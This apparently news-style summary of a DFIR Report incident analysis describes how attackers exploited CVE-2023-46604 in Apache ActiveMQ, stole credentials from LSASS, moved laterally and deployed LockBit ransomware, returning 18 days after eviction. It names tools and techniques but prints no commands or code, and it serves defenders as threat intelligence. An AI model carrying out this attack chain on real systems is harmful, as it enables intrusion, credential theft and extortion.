Apache ActiveMQ CVE-2023-46604 Exploited in LockBit Ransomware Attack Chain
The DFIR Report details an intrusion where threat actors exploited CVE-2023-46604 in Apache ActiveMQ to deploy LockBit ransomware, returning 18 days after initial eviction.
The DFIR Report has published a detailed analysis of a ransomware intrusion that began in February 2024, where a threat actor exploited CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ, to ultimately deploy LockBit ransomware. The attack chain highlights the persistence of adversaries and the critical importance of patching internet-facing vulnerabilities.
The intrusion started when the attacker used a Java Spring class and a custom XML bean configuration file to achieve remote code execution on an exposed Apache ActiveMQ server. The malicious XML contained a command that downloaded a Metasploit stager from a remote server using the Windows CertUtil utility. Within 40 minutes, the attacker escalated privileges to SYSTEM level using the GetSystem command and accessed LSASS process memory on the beachhead host.
Lateral movement followed, with the attacker using a domain administrator account to execute Metasploit payloads on several remote hosts via remote services. LSASS memory was accessed on multiple systems, including one host that contained a privileged service account later used for re-entry. Despite extensive access, some lateral movement attempts were blocked by active antivirus on targeted hosts.
On the second day, the attacker returned to the beachhead host to run discovery commands, but shortly after, they lost access to the environment. However, 18 days later, the same threat actor exploited the same unpatched Apache ActiveMQ server to regain access. They repeated the initial steps—GetSystem and LSASS access—and then used the previously stolen privileged service account to move laterally to domain controllers and other servers.
Once re-established, the attacker deployed LockBit ransomware. They used RDP to access a backup server and a file server, dropping a batch file and AnyDesk for remote access. After ensuring RDP was enabled, they dropped Advanced IP Scanner and two LockBit ransomware binaries. The ransomware was executed with specific path and password flags, and the deployment continued for approximately four hours.
The DFIR Report notes that while the ransomware binary aligns with LockBit signatures, it was likely crafted using the leaked LockBit builder, as the ransom note was modified and communication relied exclusively on the Session messaging service. The time to ransomware was 419 hours from initial access, but if the organization had only detected the second intrusion, they would have had less than 90 minutes before encryption.
This case underscores the importance of patching known vulnerabilities promptly, as CVE-2023-46604 was disclosed in late 2023 and had available patches. The attacker's ability to return after eviction highlights the need for thorough remediation and monitoring to prevent re-exploitation of the same flaw.